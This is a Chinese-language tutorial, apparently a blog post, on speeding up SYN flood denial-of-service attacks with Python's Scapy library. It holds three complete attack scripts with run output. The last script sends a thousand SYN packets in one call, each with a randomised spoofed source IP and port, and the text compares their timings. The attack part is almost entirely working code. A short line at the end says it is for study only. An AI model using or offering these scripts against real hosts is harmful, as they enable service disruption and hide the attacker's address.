()写作不易,记得点个赞哦)
在一个send函数中同时发送多个syn包是提高syn洪水攻击效率的关键,下面将给出一个简单的例子。
常规的写法(使用for循环反复调用send函数发包):
#demo.py
#written by Matriller
from scapy.all import IP, TCP, send
from random import randint
#用于计时,不是攻击中的必须组件
from time import time
def randip():
'''
返回随机的IPv4地址,用于伪造源地址
'''
return '.'.join( # IPv4地址的前三位范围为0到225,最后一位范围为1到225
[str( randint(0, 255) ) for i in range(3)] + [str( randint(1, 255) )]
)
def attack(dst, dport, amount):
'''
进行syn洪水攻击的函数
'''
#构造syn包不是本文重点,先构造一个最简单的,且不做改变
pkt = IP(src=randip(), dst=dst) / TCP(dport=dport)
#发包部分
#for循环发包
for i in range(amount):
send(pkt)
if __name__=="__main__":
amount = 1000
start_time = time()
attack("192.168.1.1", 80, amount)
use_time = time() - start_time
print(use_time, use_time/amount)
结果为:
┌──(matriller㉿Hack)-[~/桌面/Hack]
└─$ sudo python demo.py
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
(中间略)
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
.
Sent 1 packets.
34.551655292510986 0.03455165529251099
平均用时为:0.03455165529251099秒
改进后的写法(将包复制后用单个send函数发包):
#demo2.py
#written by Matriller
from scapy.all import IP, TCP, send
from random import randint
#用于计时,不是攻击中的必须组件
from time import time
def randip():
'''
返回随机的IPv4地址,用于伪造源地址
'''
return '.'.join( # IPv4地址的前三位范围为0到225,最后一位范围为1到225
[str( randint(0, 255) ) for i in range(3)] + [str( randint(1, 255) )]
)
def attack(dst, dport, amount):
'''
进行syn洪水攻击的函数
'''
#构造syn包不是本文重点,先构造一个最简单的,且不做改变
pkt = IP(src=randip(), dst=dst) / TCP(dport=dport)
#发包部分
#将syn包复制amount份后传递给send函数
send(
pkt*amount
)
if __name__=="__main__":
amount = 1000
start_time = time()
attack("192.168.1.1", 80, amount)
use_time = time() - start_time
print(use_time, use_time/amount)
结果为:
┌──(matriller㉿Hack)-[~/桌面/Hack]
└─$ sudo python demo2.py
........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Sent 1000 packets.
0.8448374271392822 0.0008448374271392823
平均用时为:0.0008448374271392823秒
第一种写法平均发包时间来比第二种慢了0.033706817865371705秒,约是第二种的40.9倍;总用时慢了33.706817865371704,倍数同上。只能说没有对比就没有伤害😜
改进版(大量发送不同的syn包):
只需要将syn包放在列表或元组中传给send函数即可,效果与上面第二种写法一样。
#demo3.py
#written by Matriller
from scapy.all import IP, TCP, send
from random import randint
#用于计时,不是攻击中的必须组件
from time import time
def randip():
'''
返回随机的IPv4地址,用于伪造源地址
'''
return '.'.join( # IPv4地址的前三位范围为0到225,最后一位范围为1到225
[str( randint(0, 255) ) for i in range(3)] + [str( randint(1, 255) )]
)
def randport():
'''
返回随机端口,用于改变出站端口
'''
return randint(1, 65535) #端口范围为0到65535,0一般不用
#
def reset(pkt):
'''
接受一个完整的syn包,重设源地址和出站端口并返回
'''
ip_pkt = pkt["IP"] #scapy使用类字典的方式访问各层
tcp_pkt = pkt["TCP"]
ip_pkt.src = randip()
tcp_pkt.sport = randport()
return ip_pkt / tcp_pkt
def attack(dst, dport, amount):
'''
进行syn洪水攻击的函数
'''
#初步构造syn包
pkt = IP(src=randip(), dst=dst) / TCP(sport=randport(), dport=dport)
#发包部分
#构造含有不同syn包的列表并传给send函数
send(
[reset(pkt) for i in range(amount)] #使用列表推导式
)
'''
不用列表推导式的版本(仅发包部分)
pkt_list = []
for i in range(amount):
pkt_list.append(reset(pkt))
send(pkt_list)
用此写法,性能差别不大(实测),此处举出是为了方便理解
'''
if __name__=="__main__":
amount = 1000
start_time = time()
attack("192.168.1.1", 80, amount)
use_time = time() - start_time
print(use_time, use_time/amount)
运行结果:
┌──(matriller㉿Hack)-[~/桌面/Hack]
└─$ sudo python demo3.py
........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Sent 1000 packets.
1.1187617778778076 0.0011187617778778075
wireshark截图:
因为要构造不同的syn包,所以用时略有增加,但性能依然比之前好得多。
(本文仅供学习,禁止进行违法行为)